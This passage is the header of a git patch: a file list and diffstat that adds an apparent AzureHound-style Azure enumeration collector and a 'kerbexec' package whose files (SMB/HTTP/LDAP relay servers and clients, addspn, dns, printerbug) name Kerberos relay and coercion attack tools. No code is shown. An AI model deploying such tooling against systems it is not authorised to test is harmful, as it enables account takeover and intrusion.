From f599c08a47dbe073451fb9aaf7f501d20936472d Mon Sep 17 00:00:00 2001 
From: pxcs
Date: Mon, 25 Nov 2024 20:41:52 +0800
Subject: [PATCH] Azure Cloud Testing (Sophy) scg
---
 .all-contributorsrc | 97 ++ .dockerignore | 2 + .github/workflows/build.yml | 112 ++ .github/workflows/cla.yml | 24 + .github/workflows/jekyll-docker.yml | 20 - .github/workflows/publish.yml | 85 + .idea/.gitignore | 8 + .idea/AzureHound.iml | 9 + .idea/modules.xml | 8 + .idea/vcs.xml | 6 + .licenserc.yaml | 18 + CONTRIBUTORS.md | 32 + Dockerfile | 16 + LICENSE => LICENSE-SEC | 0 LICENSE.md | 676 ++++++++ LICENSE.txt | 201 +++ NOTICE.md | 15 + README.md | 191 ++- azurehound.py | 261 ++++ client/app_role_assignments.go | 43 + client/apps.go | 61 + client/automation_accounts.go | 39 + client/client.go | 232 +++ client/config/config.go | 107 ++ client/container_registries.go | 39 + client/devices.go | 56 + client/function_apps.go | 39 + client/groups.go | 72 + client/keyvaults.go | 42 + client/logic_apps.go | 39 + client/managed_clusters.go | 39 + client/management_groups.go | 52 + client/mocks/client.go | 515 +++++++ client/query/params.go | 170 ++ client/resource_groups.go | 42 + client/rest/client.go | 313 ++++ client/rest/client_test.go | 69 + client/rest/http.go | 135 ++ client/rest/mocks/client.go | 153 ++ client/rest/token.go | 58 + client/rest/utils.go | 152 ++ client/role_assignments.go | 55 + client/roles.go | 39 + client/service_principals.go | 60 + client/storage_accounts.go | 56 + client/subscriptions.go | 38 + client/tenants.go | 72 + client/users.go | 43 + client/virtual_machines.go | 42 + client/vm_scale_sets.go | 39 + client/web_apps.go | 39 + cmd/configure.go | 295 ++++ cmd/install_windows.go | 157 ++ cmd/list-app-owners.go | 116 ++ cmd/list-app-owners_test.go | 91 ++ cmd/list-app-role-assignments.go | 131 ++ cmd/list-apps.go | 91 ++ cmd/list-apps_test.go | 65 + ...ist-automation-account-role-assignments.go | 136 ++ cmd/list-automation-accounts.go | 127 ++ cmd/list-azure-ad.go | 130 ++ cmd/list-azure-rm.go | 251 +++ cmd/list-container-registries.go | 
132 ++ ...ist-container-registry-role-assignments.go | 141 ++ cmd/list-device-owners.go | 131 ++ cmd/list-device-owners_test.go | 102 ++ cmd/list-devices.go | 91 ++ cmd/list-devices_test.go | 69 + cmd/list-function-app-role-assignments.go | 136 ++ cmd/list-function-apps.go | 129 ++ cmd/list-group-members.go | 142 ++ cmd/list-group-members_test.go | 102 ++ cmd/list-group-owners.go | 132 ++ cmd/list-group-owners_test.go | 102 ++ cmd/list-groups.go | 92 ++ cmd/list-groups_test.go | 70 + cmd/list-key-vault-access-policies.go | 130 ++ cmd/list-key-vault-access-policies_test.go | 79 + cmd/list-key-vault-contributors.go | 83 + cmd/list-key-vault-contributors_test.go | 73 + cmd/list-key-vault-kvcontributors.go | 83 + cmd/list-key-vault-kvcontributors_test.go | 76 + cmd/list-key-vault-owners.go | 83 + cmd/list-key-vault-owners_test.go | 76 + cmd/list-key-vault-role-assignments.go | 129 ++ cmd/list-key-vault-role-assignments_test.go | 106 ++ cmd/list-key-vault-user-access-admins.go | 83 + cmd/list-key-vault-user-access-admins_test.go | 76 + cmd/list-key-vaults.go | 130 ++ cmd/list-key-vaults_test.go | 109 ++ cmd/list-logic-app-role-assignments.go | 141 ++ cmd/list-logic-apps.go | 136 ++ cmd/list-managed-cluster-role-assignments.go | 141 ++ cmd/list-managed-clusters.go | 131 ++ cmd/list-management-group-descendants.go | 121 ++ cmd/list-management-group-descendants_test.go | 103 ++ cmd/list-management-group-owners.go | 80 + cmd/list-management-group-owners_test.go | 76 + cmd/list-management-group-role-assignments.go | 132 ++ ...-management-group-role-assignments_test.go | 106 ++ ...ist-management-group-user-access-admins.go | 80 + ...anagement-group-user-access-admins_test.go | 76 + cmd/list-management-groups.go | 94 ++ cmd/list-management-groups_test.go | 69 + cmd/list-resource-group-owners.go | 83 + cmd/list-resource-group-owners_test.go | 76 + cmd/list-resource-group-role-assignments.go | 130 ++ ...st-resource-group-role-assignments_test.go | 106 ++ 
cmd/list-resource-group-user-access-admins.go | 81 + ...-resource-group-user-access-admins_test.go | 76 + cmd/list-resource-groups.go | 127 ++ cmd/list-resource-groups_test.go | 109 ++ cmd/list-role-assignments.go | 136 ++ cmd/list-role-assignments_test.go | 33 + cmd/list-roles.go | 91 ++ cmd/list-roles_test.go | 69 + cmd/list-root.go | 70 + cmd/list-service-principal-owners.go | 132 ++ cmd/list-service-principal-owners_test.go | 102 ++ cmd/list-service-principals.go | 91 ++ cmd/list-service-principals_test.go | 69 + cmd/list-storage-account-role-assignments.go | 136 ++ cmd/list-storage-accounts.go | 127 ++ cmd/list-storage-containers.go | 135 ++ cmd/list-subscription-owners.go | 108 ++ cmd/list-subscription-owners_test.go | 78 + cmd/list-subscription-role-assignments.go | 132 ++ ...list-subscription-role-assignments_test.go | 114 ++ cmd/list-subscription-user-access-admins.go | 109 ++ ...st-subscription-user-access-admins_test.go | 78 + cmd/list-subscriptions.go | 115 ++ cmd/list-subscriptions_test.go | 69 + cmd/list-tenants.go | 104 ++ cmd/list-tenants_test.go | 69 + cmd/list-users.go | 106 ++ cmd/list-users_test.go | 70 + cmd/list-virtual-machine-admin-logins.go | 81 + cmd/list-virtual-machine-admin-logins_test.go | 76 + ...list-virtual-machine-avere-contributors.go | 81 + ...virtual-machine-avere-contributors_test.go | 76 + cmd/list-virtual-machine-contributors.go | 81 + cmd/list-virtual-machine-contributors_test.go | 76 + cmd/list-virtual-machine-owners.go | 81 + cmd/list-virtual-machine-owners_test.go | 76 + cmd/list-virtual-machine-role-assignments.go | 129 ++ ...t-virtual-machine-role-assignments_test.go | 106 ++ ...list-virtual-machine-user-access-admins.go | 81 + ...virtual-machine-user-access-admins_test.go | 76 + cmd/list-virtual-machine-vmcontributors.go | 81 + ...ist-virtual-machine-vmcontributors_test.go | 76 + cmd/list-virtual-machines.go | 127 ++ cmd/list-virtual-machines_test.go | 109 ++ cmd/list-vm-scale-set-role-assignments.go | 141 ++ 
cmd/list-vm-scale-sets.go | 132 ++ cmd/list-web-app-role-assignments.go | 141 ++ cmd/list-web-apps.go | 134 ++ cmd/root.go | 47 + cmd/start.go | 439 ++++++ cmd/svc_windows.go | 82 + cmd/uninstall_windows.go | 67 + cmd/utils.go | 489 ++++++ config/config.go | 372 +++++ config/internal/config.go | 157 ++ config/internal/config_test.go | 99 ++ config/utils.go | 88 ++ config/utils_test.go | 75 + constants/environments.go | 71 + constants/misc.go | 44 + constants/roles.go | 1370 +++++++++++++++++ enums/accesstype.go | 25 + enums/account_immutability_policy_state.go | 26 + enums/agegroup.go | 26 + enums/allowedcopyscope.go | 25 + enums/auth-method.go | 34 + enums/auto_heal_action_type.go | 26 + enums/automation_account_identity_type.go | 27 + enums/automation_account_state.go | 26 + enums/autoreplystatus.go | 26 + enums/azure_storage_state.go | 27 + enums/azure_storage_type.go | 25 + enums/blob_restore_progress_status.go | 26 + enums/bypassoption.go | 27 + enums/capabiltystatus.go | 37 + enums/client_cert_mode.go | 26 + enums/connection_string_type.go | 34 + enums/consentforminor.go | 31 + enums/createmode.go | 26 + enums/creationtype.go | 35 + enums/dayofweek.go | 30 + enums/deviceprofile.go | 28 + enums/directory_service_options.go | 26 + enums/dns_endpoint_type.go | 25 + enums/encryption_key_source_type.go | 26 + enums/encryption_key_type.go | 25 + enums/endpointconnectionstatus.go | 28 + enums/endpointprovisioningstate.go | 30 + enums/entity.go | 62 + enums/externalaudiencescope.go | 26 + enums/externaluserstate.go | 25 + enums/ftps_state.go | 26 + enums/generic_enabled_disabled.go | 25 + enums/geo_replication_status.go | 26 + enums/groupvisibility.go | 38 + enums/hosttype.go | 25 + enums/hypervgeneration.go | 25 + enums/identity.go | 30 + enums/immutability_policy_state.go | 25 + enums/immutability_policy_update_type.go | 26 + enums/ip_filter_tag.go | 26 + enums/ipallocationmethod.go | 25 + enums/ipsku.go | 25 + enums/ipskutier.go | 25 + 
enums/key-vault-access-type.go | 34 + enums/kind.go | 83 + enums/lease_duration.go | 25 + enums/lease_state.go | 28 + enums/lease_status.go | 25 + enums/legalagegroup.go | 36 + enums/legalagegrouprule.go | 40 + enums/licenseerror.go | 29 + enums/licenseprocessingstate.go | 27 + enums/licensestate.go | 27 + enums/logic_app_provisioning_state.go | 41 + enums/logic_app_state.go | 29 + enums/maintenanceoperationcode.go | 27 + enums/managed_pipeline_mode.go | 25 + enums/messagedeliveryoptions.go | 26 + enums/migration_state.go | 25 + enums/minimum_tls_version.go | 30 + enums/networkaction.go | 27 + enums/parameter_type.go | 32 + enums/patchstatus.go | 28 + enums/redundancy_mode.go | 28 + enums/relationship.go | 48 + enums/resourcebehavior.go | 39 + enums/resourceprovisioning.go | 28 + enums/routing_choice.go | 25 + enums/ruleprocessingstate.go | 25 + enums/scm_type.go | 37 + enums/serviceprincipaltype.go | 42 + enums/share_permissions.go | 27 + enums/signinaudience.go | 35 + enums/signintype.go | 27 + enums/site_availability_state.go | 26 + enums/site_load_balancing.go | 29 + enums/sku_converstion_status.go | 26 + enums/sku_name.go | 37 + enums/spendinglimit.go | 26 + enums/ssl_state.go | 26 + enums/ssomode.go | 27 + enums/statuslevel.go | 26 + enums/storage_account_access_tier.go | 26 + enums/storage_account_provisioning_state.go | 26 + enums/storage_account_status.go | 25 + enums/storage_container_public_access.go | 26 + enums/storagetype.go | 29 + enums/subscriptionstate.go | 28 + enums/tenantcategory.go | 27 + enums/trusttype.go | 32 + enums/usage_state.go | 25 + enums/vaultprovisioningstate.go | 26 + enums/vaultsku.go | 26 + enums/vmdeleteoption.go | 25 + enums/vmevictionpolicy.go | 25 + enums/vmpriority.go | 26 + go.mod | 43 + go.sum | 827 ++++++++++ internal/utils.go | 19 + kerbexec/__init__.py | 1 + kerbexec/clients/__init__.py | 101 ++ kerbexec/clients/httprelayclient.py | 126 ++ kerbexec/clients/ldaprelayclient.py | 61 + kerbexec/clients/smbrelayclient.py | 
415 +++++ kerbexec/exp/addspn.py | 211 +++ kerbexec/exp/dns.py | 610 ++++++++ kerbexec/exp/printerbug.py | 253 +++ kerbexec/krb.gitignore | 5 + kerbexec/servers/__init__.py | 3 + kerbexec/servers/dnsrelayserver.py | 108 ++ kerbexec/servers/httprelayserver.py | 168 ++ kerbexec/servers/smbrelayserver.py | 595 +++++++ kerbexec/utils/__init__.py | 1 + kerbexec/utils/config.py | 57 + kerbexec/utils/kerberos.py | 335 ++++ kerbexec/utils/krbcredccache.py | 66 + kerbexec/utils/spnego.py | 124 ++ logger/eventlog-transport_windows.go | 65 + logger/internal/logger.go | 176 +++ logger/internal/logger_test.go | 135 ++ logger/log.go | 47 + logger/log_windows.go | 69 + logger/utils.go | 56 + main.go | 34 + main_windows.go | 41 + models/app-member.go | 38 + models/app-owner.go | 44 + models/app-role-assignments.go | 28 + models/app.go | 28 + models/automation-account.go | 28 + models/azure-role-assignment.go | 31 + models/azure/access_policy_entry.go | 35 + models/azure/addin.go | 29 + models/azure/additional_capabilities.go | 29 + models/azure/additional_unattend_content.go | 36 + models/azure/alt_security_id.go | 27 + models/azure/api_application.go | 59 + models/azure/app_profile.go | 24 + models/azure/app_role.go | 41 + models/azure/app_role_assignment.go | 39 + models/azure/app_scope.go | 41 + models/azure/application.go | 171 ++ models/azure/assigned_label.go | 31 + models/azure/assigned_license.go | 29 + models/azure/assigned_plan.go | 38 + models/azure/auto_heal_rules.go | 75 + models/azure/automatic_replies_setting.go | 45 + models/azure/automation_account.go | 52 + models/azure/automation_account_properties.go | 34 + .../azure/automation_account_system_data.go | 29 + models/azure/available_patch_summary.go | 51 + ...ure_files_identity_based_authentication.go | 37 + models/azure/azure_storage_info_value.go | 29 + models/azure/billing_profile.go | 40 + models/azure/blob_restore_status.go | 37 + models/azure/boot_diagnostics.go | 27 + 
.../azure/boot_diagnostics_instance_view.go | 33 + models/azure/capacity_reservation_profile.go | 26 + models/azure/cloning_info.go | 32 + models/azure/common.go | 45 + models/azure/connection_item_properties.go | 31 + models/azure/connection_string_info.go | 26 + models/azure/container_registry.go | 49 + models/azure/data_disk.go | 95 ++ models/azure/datetime_timezone.go | 27 + models/azure/descendant-info.go | 62 + models/azure/device.go | 131 ++ models/azure/diagnostics_profile.go | 27 + models/azure/diff_disk_settings.go | 36 + models/azure/directory_object.go | 31 + models/azure/disk_encryption_set_params.go | 26 + models/azure/disk_encryption_settings.go | 30 + models/azure/disk_instance_view.go | 31 + models/azure/employee_org_data.go | 33 + models/azure/encryption_properties.go | 61 + models/azure/entity.go | 22 + models/azure/extended_location.go | 23 + models/azure/function_app.go | 51 + models/azure/function_app_props.go | 84 + models/azure/geo_replication_stats.go | 26 + models/azure/group.go | 281 ++++ models/azure/hardware_profile.go | 40 + models/azure/hosting_environment_profile.go | 24 + models/azure/hostname_ssl_state.go | 29 + models/azure/image_reference.go | 50 + models/azure/immutability_policy.go | 24 + .../azure/immutability_policy_properties.go | 27 + .../azure/immutable_policy_update_history.go | 31 + models/azure/immutable_storage_account.go | 31 + .../immutable_storage_with_versioning.go | 26 + models/azure/implicit_grant_settings.go | 29 + models/azure/informational_url.go | 37 + models/azure/instance_view_status.go | 37 + models/azure/ip_rule.go | 25 + models/azure/ip_security_restriction.go | 34 + models/azure/key_credential.go | 56 + models/azure/key_value.go | 23 + models/azure/key_vault.go | 58 + models/azure/key_vault_key_ref.go | 27 + models/azure/key_vault_secret_ref.go | 27 + models/azure/keyvault_permissions.go | 33 + .../azure/last_patch_installation_summary.go | 60 + models/azure/license_assignment_state.go | 48 + 
models/azure/linux_config.go | 36 + models/azure/linux_patch_settings.go | 33 + models/azure/locale_info.go | 27 + models/azure/logic_app.go | 49 + models/azure/logic_app_definition.go | 90 ++ models/azure/logic_app_parameter.go | 55 + models/azure/logic_app_properties.go | 51 + models/azure/logic_app_sku.go | 25 + models/azure/mailbox_settings.go | 48 + models/azure/maintenance_redeploy_status.go | 44 + models/azure/managed_by_tenant.go | 26 + models/azure/managed_cluster.go | 52 + models/azure/managed_cluster_properties.go | 24 + models/azure/managed_disk_params.go | 33 + models/azure/managed_identity.go | 42 + models/azure/management_group.go | 31 + models/azure/management_group_child_info.go | 27 + models/azure/management_group_details.go | 26 + models/azure/management_group_path_elem.go | 23 + models/azure/management_group_props.go | 33 + models/azure/name_value_pair.go | 23 + models/azure/network_interface_ref.go | 26 + .../network_interface_reference_props.go | 28 + models/azure/network_profile.go | 31 + models/azure/network_rule_set.go | 39 + models/azure/object_identity.go | 55 + models/azure/onprem_ext_attributes.go | 48 + models/azure/onprem_provisioning_error.go | 36 + models/azure/optional_claims.go | 59 + models/azure/organization.go | 140 ++ models/azure/os_disk.go | 78 + models/azure/os_profile.go | 80 + models/azure/parent_group_info.go | 24 + models/azure/parental_controls_settings.go | 29 + models/azure/password_credential.go | 47 + models/azure/password_profile.go | 38 + models/azure/permission_scope.go | 67 + models/azure/plan.go | 37 + models/azure/preauthorized_application.go | 31 + models/azure/privacy_profile.go | 32 + models/azure/private_endpoint.go | 23 + models/azure/private_endpoint_connection.go | 28 + .../azure/private_endpoint_connection_item.go | 29 + .../private_endpoint_connection_properties.go | 31 + .../private_endpoint_connection_resource.go | 26 + .../private_link_service_connection_state.go | 32 + 
models/azure/provisioned_plan.go | 29 + models/azure/public_client_application.go | 26 + models/azure/push_settings.go | 33 + models/azure/required_resource_access.go | 45 + models/azure/resource_group.go | 41 + models/azure/resource_group_props.go | 22 + models/azure/resource_reference.go | 25 + models/azure/role.go | 69 + models/azure/role_assignment.go | 47 + models/azure/role_permission.go | 35 + models/azure/routing_preference.go | 26 + models/azure/saml_sso_settings.go | 24 + models/azure/sas_policy.go | 25 + models/azure/scheduled_events_profile.go | 23 + models/azure/security_profile.go | 35 + models/azure/service_principal.go | 179 +++ models/azure/site_config.go | 152 ++ models/azure/site_machine_key.go | 25 + models/azure/sku.go | 29 + models/azure/slot_swap_status.go | 24 + models/azure/spa_application.go | 25 + models/azure/ssh_config.go | 24 + models/azure/ssh_public_key.go | 30 + models/azure/storage_account.go | 52 + .../storage_account_primary_endpoints.go | 45 + models/azure/storage_account_props.go | 79 + .../storage_account_sku_conversion_status.go | 27 + models/azure/storage_container.go | 65 + models/azure/storage_container_legal_hold.go | 37 + models/azure/storage_container_props.go | 42 + models/azure/storage_profile.go | 34 + models/azure/sub_resource.go | 23 + models/azure/subscription.go | 51 + models/azure/subscription_policies.go | 33 + models/azure/tenant.go | 38 + .../azure/terminate_notification_profile.go | 28 + models/azure/timezone_base.go | 23 + models/azure/uefi_settings.go | 28 + models/azure/unified_role_assignment.go | 76 + models/azure/unified_role_definition.go | 62 + models/azure/unified_role_permission.go | 71 + models/azure/user.go | 467 ++++++ models/azure/user_assigned_identity.go | 23 + models/azure/vault_certificate.go | 44 + models/azure/vault_props.go | 87 ++ models/azure/vault_secret_group.go | 27 + models/azure/verified_domain.go | 36 + models/azure/verified_publisher.go | 31 + models/azure/virtual_application.go 
| 30 + models/azure/virtual_hard_disk.go | 23 + models/azure/virtual_machine.go | 53 + .../virtual_machine_agent_instance_view.go | 30 + models/azure/virtual_machine_extension.go | 38 + ...machine_extension_handler_instance_view.go | 30 + ...virtual_machine_extension_instance_view.go | 36 + models/azure/virtual_machine_health_status.go | 24 + models/azure/virtual_machine_instance_view.go | 76 + ...irtual_machine_network_interface_config.go | 26 + models/azure/virtual_machine_patch_status.go | 30 + models/azure/virtual_machine_props.go | 50 + models/azure/virtual_network_rule.go | 28 + models/azure/vm_extension_props.go | 59 + models/azure/vm_gallery_app.go | 35 + models/azure/vm_ip_config_props.go | 46 + models/azure/vm_ip_tag.go | 27 + .../vm_network_interface_config_props.go | 49 + .../vm_network_interface_dns_settings.go | 24 + .../azure/vm_network_interface_ip_config.go | 23 + models/azure/vm_public_ip_config.go | 29 + models/azure/vm_public_ip_config_props.go | 43 + models/azure/vm_public_ip_dns_settings.go | 25 + models/azure/vm_public_ip_sku.go | 31 + models/azure/vm_scale_set.go | 51 + models/azure/vm_size_props.go | 32 + models/azure/web_app.go | 50 + models/azure/web_application.go | 35 + models/azure/win_rm_config.go | 24 + models/azure/win_rm_listener.go | 42 + models/azure/windows_config.go | 43 + models/azure/windows_patch_settings.go | 39 + models/azure/working_hours.go | 34 + models/container-registry.go | 28 + models/device-owner.go | 44 + models/device.go | 28 + models/function-app.go | 28 + models/group-member.go | 44 + models/group-owner.go | 44 + models/group.go | 28 + models/ingest-request.go | 29 + models/job.go | 62 + models/key-vault-access-policy.go | 25 + models/key-vault-contributor.go | 30 + models/key-vault-kvcontributor.go | 30 + models/key-vault-owner.go | 30 + models/key-vault-role-assignment.go | 30 + models/key-vault-user-access-admin.go | 30 + models/key-vault.go | 27 + models/logic-app.go | 28 + models/managed-cluster.go | 27 + 
models/management-group-owner.go | 32 + models/management-group-role-assignment.go | 30 + models/management-group-user-access-admin.go | 32 + models/mgmt-group.go | 28 + models/resource-group-owner.go | 32 + models/resource-group-role-assignment.go | 30 + models/resource-group-user-access-admin.go | 32 + models/resource-group.go | 26 + models/role-assignments.go | 28 + models/role.go | 28 + models/service-principal-owner.go | 44 + models/service-principal.go | 26 + models/storage-account.go | 28 + models/storage-container.go | 29 + models/subscription-owner.go | 30 + models/subscription-role-assignment.go | 30 + models/subscription-user-access-admin.go | 30 + models/subscription.go | 25 + models/task.go | 38 + models/tenant.go | 25 + models/update-client-request.go | 35 + models/user.go | 28 + models/utils.go | 65 + models/utils_test.go | 228 +++ models/virtual-machine-admin-login.go | 30 + models/virtual-machine-avere-contributor.go | 30 + models/virtual-machine-contributor.go | 30 + models/virtual-machine-owner.go | 30 + models/virtual-machine-role-assignment.go | 30 + models/virtual-machine-user-access-admin.go | 30 + models/virtual-machine-vmcontributor.go | 30 + models/virtual-machine.go | 27 + models/vm-scale-set.go | 27 + models/web-app.go | 28 + panicrecovery/panic_recovery.go | 33 + pipeline/pipeline.go | 276 ++++ pipeline/pipeline_test.go | 106 ++ sec.gitignore | 234 +++ sinks/console.go | 31 + sinks/file.go | 64 + test/1.jpg | Bin 612508 -> 0 bytes test/2.jpg | Bin 873959 -> 0 bytes test/3.jpeg | Bin 117049 -> 0 bytes test/4.jpg | Bin 42061 -> 0 bytes test/5.jpg | Bin 96661 -> 0 bytes test/6.jpg | Bin 151714 -> 0 bytes test/SlidesIndex.html | 64 - test/styles.css | 107 -- 565 files changed, 38224 insertions(+), 291 deletions(-) create mode 100644 .all-contributorsrc create mode 100644 .dockerignore create mode 100644 .github/workflows/build.yml create mode 100644 .github/workflows/cla.yml delete mode 100644 .github/workflows/jekyll-docker.yml create mode 
100644 .github/workflows/publish.yml create mode 100644 .idea/.gitignore create mode 100644 .idea/AzureHound.iml create mode 100644 .idea/modules.xml create mode 100644 .idea/vcs.xml create mode 100644 .licenserc.yaml create mode 100644 CONTRIBUTORS.md create mode 100644 Dockerfile rename LICENSE => LICENSE-SEC (100%) create mode 100644 LICENSE.md create mode 100644 LICENSE.txt create mode 100644 NOTICE.md create mode 100644 azurehound.py create mode 100644 client/app_role_assignments.go create mode 100644 client/apps.go create mode 100644 client/automation_accounts.go create mode 100644 client/client.go create mode 100644 client/config/config.go create mode 100644 client/container_registries.go create mode 100644 client/devices.go create mode 100644 client/function_apps.go create mode 100644 client/groups.go create mode 100644 client/keyvaults.go create mode 100644 client/logic_apps.go create mode 100644 client/managed_clusters.go create mode 100644 client/management_groups.go create mode 100644 client/mocks/client.go create mode 100644 client/query/params.go create mode 100644 client/resource_groups.go create mode 100644 client/rest/client.go create mode 100644 client/rest/client_test.go create mode 100644 client/rest/http.go create mode 100644 client/rest/mocks/client.go create mode 100644 client/rest/token.go create mode 100644 client/rest/utils.go create mode 100644 client/role_assignments.go create mode 100644 client/roles.go create mode 100644 client/service_principals.go create mode 100644 client/storage_accounts.go create mode 100644 client/subscriptions.go create mode 100644 client/tenants.go create mode 100644 client/users.go create mode 100644 client/virtual_machines.go create mode 100644 client/vm_scale_sets.go create mode 100644 client/web_apps.go create mode 100644 cmd/configure.go create mode 100644 cmd/install_windows.go create mode 100644 cmd/list-app-owners.go create mode 100644 cmd/list-app-owners_test.go create mode 100644 
cmd/list-app-role-assignments.go create mode 100644 cmd/list-apps.go create mode 100644 cmd/list-apps_test.go create mode 100644 cmd/list-automation-account-role-assignments.go create mode 100644 cmd/list-automation-accounts.go create mode 100644 cmd/list-azure-ad.go create mode 100644 cmd/list-azure-rm.go create mode 100644 cmd/list-container-registries.go create mode 100644 cmd/list-container-registry-role-assignments.go create mode 100644 cmd/list-device-owners.go create mode 100644 cmd/list-device-owners_test.go create mode 100644 cmd/list-devices.go create mode 100644 cmd/list-devices_test.go create mode 100644 cmd/list-function-app-role-assignments.go create mode 100644 cmd/list-function-apps.go create mode 100644 cmd/list-group-members.go create mode 100644 cmd/list-group-members_test.go create mode 100644 cmd/list-group-owners.go create mode 100644 cmd/list-group-owners_test.go create mode 100644 cmd/list-groups.go create mode 100644 cmd/list-groups_test.go create mode 100644 cmd/list-key-vault-access-policies.go create mode 100644 cmd/list-key-vault-access-policies_test.go create mode 100644 cmd/list-key-vault-contributors.go create mode 100644 cmd/list-key-vault-contributors_test.go create mode 100644 cmd/list-key-vault-kvcontributors.go create mode 100644 cmd/list-key-vault-kvcontributors_test.go create mode 100644 cmd/list-key-vault-owners.go create mode 100644 cmd/list-key-vault-owners_test.go create mode 100644 cmd/list-key-vault-role-assignments.go create mode 100644 cmd/list-key-vault-role-assignments_test.go create mode 100644 cmd/list-key-vault-user-access-admins.go create mode 100644 cmd/list-key-vault-user-access-admins_test.go create mode 100644 cmd/list-key-vaults.go create mode 100644 cmd/list-key-vaults_test.go create mode 100644 cmd/list-logic-app-role-assignments.go create mode 100644 cmd/list-logic-apps.go create mode 100644 cmd/list-managed-cluster-role-assignments.go create mode 100644 cmd/list-managed-clusters.go create mode 100644 
cmd/list-management-group-descendants.go create mode 100644 cmd/list-management-group-descendants_test.go create mode 100644 cmd/list-management-group-owners.go create mode 100644 cmd/list-management-group-owners_test.go create mode 100644 cmd/list-management-group-role-assignments.go create mode 100644 cmd/list-management-group-role-assignments_test.go create mode 100644 cmd/list-management-group-user-access-admins.go create mode 100644 cmd/list-management-group-user-access-admins_test.go create mode 100644 cmd/list-management-groups.go create mode 100644 cmd/list-management-groups_test.go create mode 100644 cmd/list-resource-group-owners.go create mode 100644 cmd/list-resource-group-owners_test.go create mode 100644 cmd/list-resource-group-role-assignments.go create mode 100644 cmd/list-resource-group-role-assignments_test.go create mode 100644 cmd/list-resource-group-user-access-admins.go create mode 100644 cmd/list-resource-group-user-access-admins_test.go create mode 100644 cmd/list-resource-groups.go create mode 100644 cmd/list-resource-groups_test.go create mode 100644 cmd/list-role-assignments.go create mode 100644 cmd/list-role-assignments_test.go create mode 100644 cmd/list-roles.go create mode 100644 cmd/list-roles_test.go create mode 100644 cmd/list-root.go create mode 100644 cmd/list-service-principal-owners.go create mode 100644 cmd/list-service-principal-owners_test.go create mode 100644 cmd/list-service-principals.go create mode 100644 cmd/list-service-principals_test.go create mode 100644 cmd/list-storage-account-role-assignments.go create mode 100644 cmd/list-storage-accounts.go create mode 100644 cmd/list-storage-containers.go create mode 100644 cmd/list-subscription-owners.go create mode 100644 cmd/list-subscription-owners_test.go create mode 100644 cmd/list-subscription-role-assignments.go create mode 100644 cmd/list-subscription-role-assignments_test.go create mode 100644 cmd/list-subscription-user-access-admins.go create mode 100644 
cmd/list-subscription-user-access-admins_test.go create mode 100644 cmd/list-subscriptions.go create mode 100644 cmd/list-subscriptions_test.go create mode 100644 cmd/list-tenants.go create mode 100644 cmd/list-tenants_test.go create mode 100644 cmd/list-users.go create mode 100644 cmd/list-users_test.go create mode 100644 cmd/list-virtual-machine-admin-logins.go create mode 100644 cmd/list-virtual-machine-admin-logins_test.go create mode 100644 cmd/list-virtual-machine-avere-contributors.go create mode 100644 cmd/list-virtual-machine-avere-contributors_test.go create mode 100644 cmd/list-virtual-machine-contributors.go create mode 100644 cmd/list-virtual-machine-contributors_test.go create mode 100644 cmd/list-virtual-machine-owners.go create mode 100644 cmd/list-virtual-machine-owners_test.go create mode 100644 cmd/list-virtual-machine-role-assignments.go create mode 100644 cmd/list-virtual-machine-role-assignments_test.go create mode 100644 cmd/list-virtual-machine-user-access-admins.go create mode 100644 cmd/list-virtual-machine-user-access-admins_test.go create mode 100644 cmd/list-virtual-machine-vmcontributors.go create mode 100644 cmd/list-virtual-machine-vmcontributors_test.go create mode 100644 cmd/list-virtual-machines.go create mode 100644 cmd/list-virtual-machines_test.go create mode 100644 cmd/list-vm-scale-set-role-assignments.go create mode 100644 cmd/list-vm-scale-sets.go create mode 100644 cmd/list-web-app-role-assignments.go create mode 100644 cmd/list-web-apps.go create mode 100644 cmd/root.go create mode 100644 cmd/start.go create mode 100644 cmd/svc_windows.go create mode 100644 cmd/uninstall_windows.go create mode 100644 cmd/utils.go create mode 100644 config/config.go create mode 100644 config/internal/config.go create mode 100644 config/internal/config_test.go create mode 100644 config/utils.go create mode 100644 config/utils_test.go create mode 100644 constants/environments.go create mode 100644 constants/misc.go create mode 100644 
constants/roles.go create mode 100644 enums/accesstype.go create mode 100644 enums/account_immutability_policy_state.go create mode 100644 enums/agegroup.go create mode 100644 enums/allowedcopyscope.go create mode 100644 enums/auth-method.go create mode 100644 enums/auto_heal_action_type.go create mode 100644 enums/automation_account_identity_type.go create mode 100644 enums/automation_account_state.go create mode 100644 enums/autoreplystatus.go create mode 100644 enums/azure_storage_state.go create mode 100644 enums/azure_storage_type.go create mode 100644 enums/blob_restore_progress_status.go create mode 100644 enums/bypassoption.go create mode 100644 enums/capabiltystatus.go create mode 100644 enums/client_cert_mode.go create mode 100644 enums/connection_string_type.go create mode 100644 enums/consentforminor.go create mode 100644 enums/createmode.go create mode 100644 enums/creationtype.go create mode 100644 enums/dayofweek.go create mode 100644 enums/deviceprofile.go create mode 100644 enums/directory_service_options.go create mode 100644 enums/dns_endpoint_type.go create mode 100644 enums/encryption_key_source_type.go create mode 100644 enums/encryption_key_type.go create mode 100644 enums/endpointconnectionstatus.go create mode 100644 enums/endpointprovisioningstate.go create mode 100644 enums/entity.go create mode 100644 enums/externalaudiencescope.go create mode 100644 enums/externaluserstate.go create mode 100644 enums/ftps_state.go create mode 100644 enums/generic_enabled_disabled.go create mode 100644 enums/geo_replication_status.go create mode 100644 enums/groupvisibility.go create mode 100644 enums/hosttype.go create mode 100644 enums/hypervgeneration.go create mode 100644 enums/identity.go create mode 100644 enums/immutability_policy_state.go create mode 100644 enums/immutability_policy_update_type.go create mode 100644 enums/ip_filter_tag.go create mode 100644 enums/ipallocationmethod.go create mode 100644 enums/ipsku.go create mode 100644 
enums/ipskutier.go create mode 100644 enums/key-vault-access-type.go create mode 100644 enums/kind.go create mode 100644 enums/lease_duration.go create mode 100644 enums/lease_state.go create mode 100644 enums/lease_status.go create mode 100644 enums/legalagegroup.go create mode 100644 enums/legalagegrouprule.go create mode 100644 enums/licenseerror.go create mode 100644 enums/licenseprocessingstate.go create mode 100644 enums/licensestate.go create mode 100644 enums/logic_app_provisioning_state.go create mode 100644 enums/logic_app_state.go create mode 100644 enums/maintenanceoperationcode.go create mode 100644 enums/managed_pipeline_mode.go create mode 100644 enums/messagedeliveryoptions.go create mode 100644 enums/migration_state.go create mode 100644 enums/minimum_tls_version.go create mode 100644 enums/networkaction.go create mode 100644 enums/parameter_type.go create mode 100644 enums/patchstatus.go create mode 100644 enums/redundancy_mode.go create mode 100644 enums/relationship.go create mode 100644 enums/resourcebehavior.go create mode 100644 enums/resourceprovisioning.go create mode 100644 enums/routing_choice.go create mode 100644 enums/ruleprocessingstate.go create mode 100644 enums/scm_type.go create mode 100644 